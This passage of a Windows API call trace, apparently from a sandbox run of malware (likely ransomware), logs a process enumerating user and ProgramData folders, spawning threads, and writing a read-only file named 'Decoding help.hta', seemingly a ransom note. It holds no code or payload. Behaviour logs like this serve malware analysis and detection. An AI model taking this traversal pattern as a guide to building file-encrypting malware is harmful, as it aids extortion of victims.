lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\", lpString2="Data" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data" [0049.080] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*.*" [0049.080] GlobalMemoryStatus (in: lpBuffer=0x738fd10 | out: lpBuffer=0x738fd10) [0049.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f27290, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0049.087] CloseHandle (hObject=0x540) returned 1 [0049.087] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DQQ19BCJ.JAX", cAlternateFileName="")) returned 1 [0049.087] lstrcmpW (lpString1=".", lpString2="DQQ19BCJ.JAX") returned -1 [0049.087] lstrcmpW (lpString1="..", lpString2="DQQ19BCJ.JAX") returned -1 [0049.087] lstrcmpiW (lpString1="windows", lpString2="DQQ19BCJ.JAX") returned 1 [0049.087] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*" [0049.087] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*.*") returned 60 [0049.087] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\", lpString2="DQQ19BCJ.JAX" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX" [0049.087] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\*.*" [0049.087] GlobalMemoryStatus (in: lpBuffer=0x738fd10 | out: lpBuffer=0x738fd10) [0049.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9862720, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x540 [0049.100] CloseHandle (hObject=0x540) returned 1 [0049.101] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0x738fd30 | out: lpFindFileData=0x738fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DQQ19BCJ.JAX", cAlternateFileName="")) returned 0 [0049.101] FindClose (in: hFindFile=0x671f70 | out: hFindFile=0x671f70) returned 1 Thread: id = 654 os_tid = 0xe7c [0049.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*", lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671eb0 [0049.086] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.086] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.086] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.086] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.086] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0049.086] lstrcmpW (lpString1=".", lpString2="Content") returned -1 [0049.086] lstrcmpW (lpString1="..", lpString2="Content") returned -1 [0049.086] lstrcmpiW (lpString1="windows", lpString2="Content") returned 1 [0049.086] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" [0049.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned 81 [0049.086] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\", lpString2="Content" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0049.086] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" [0049.086] GlobalMemoryStatus (in: lpBuffer=0xd38fd10 | out: lpBuffer=0xd38fd10) [0049.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108984c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2bc [0049.099] CloseHandle (hObject=0x2bc) returned 1 [0049.099] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0049.099] lstrcmpW (lpString1=".", lpString2="MetaData") returned -1 [0049.099] lstrcmpW (lpString1="..", lpString2="MetaData") returned -1 [0049.099] lstrcmpiW (lpString1="windows", lpString2="MetaData") returned 1 [0049.099] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" [0049.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned 81 [0049.099] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\", lpString2="MetaData" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0049.099] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" [0049.099] GlobalMemoryStatus (in: lpBuffer=0xd38fd10 | out: lpBuffer=0xd38fd10) [0049.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9882790, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2bc [0049.111] CloseHandle (hObject=0x2bc) returned 1 [0049.111] FindNextFileW (in: hFindFile=0x671eb0, lpFindFileData=0xd38fd30 | out: lpFindFileData=0xd38fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0049.111] FindClose (in: hFindFile=0x671eb0 | out: hFindFile=0x671eb0) returned 1 Thread: id = 655 os_tid = 0xe80 [0049.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*.*", lpFindFileData=0xd68fd30 | out: lpFindFileData=0xd68fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2df0 [0051.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.509] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0xd68fd30 | out: lpFindFileData=0xd68fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.509] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0051.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.509] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0xd68fd30 | out: lpFindFileData=0xd68fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0051.509] FindClose (in: hFindFile=0x5e2df0 | out: hFindFile=0x5e2df0) returned 1 Thread: id = 656 os_tid = 0xe88 [0049.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*", lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671f70 [0049.107] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.107] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.107] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.107] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.107] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0049.107] lstrcmpW (lpString1=".", lpString2="Security") returned -1 [0049.107] lstrcmpW (lpString1="..", lpString2="Security") returned -1 [0049.107] lstrcmpiW (lpString1="windows", lpString2="Security") returned 1 [0049.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*" [0049.110] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*.*") returned 55 [0049.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\", lpString2="Security" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0049.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*.*" [0049.110] GlobalMemoryStatus (in: lpBuffer=0xd8cfd10 | out: lpBuffer=0xd8cfd10) [0049.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d9ea50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6fc [0049.120] CloseHandle (hObject=0x6fc) returned 1 [0049.120] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0xd8cfd30 | out: lpFindFileData=0xd8cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0049.120] FindClose (in: hFindFile=0x671f70 | out: hFindFile=0x671f70) returned 1 Thread: id = 657 os_tid = 0xe84 [0049.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*.*", lpFindFileData=0xd9cfd30 | out: lpFindFileData=0xd9cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8890 [0052.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0052.044] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0xd9cfd30 | out: lpFindFileData=0xd9cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.044] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0052.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0052.044] FindNextFileW (in: hFindFile=0x5d8890, lpFindFileData=0xd9cfd30 | out: lpFindFileData=0xd9cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0052.044] FindClose (in: hFindFile=0x5d8890 | out: hFindFile=0x5d8890) returned 1 Thread: id = 658 os_tid = 0xe8c [0049.125] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0xef8fd30 | out: lpFindFileData=0xef8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671f70 [0049.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.125] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0xef8fd30 | out: lpFindFileData=0xef8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.125] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.125] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.125] FindNextFileW (in: hFindFile=0x671f70, lpFindFileData=0xef8fd30 | out: lpFindFileData=0xef8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa87bcb00, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0xa87bcb00, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0xa87bcb00, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x588124, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0049.126] lstrcpyW (in: lpString1=0x989a7f8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0049.126] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0049.126] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0049.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0xffffffff [0049.126] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0051.017] WriteFile (in: hFile=0x524, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xef8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xef8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.532] CloseHandle (hObject=0x524) returned 1 [0053.665] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.607] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0057.607] lstrlenW (lpString="cab1.cab") returned 8 [0057.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0057.607] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 121 [0057.607] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0057.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package 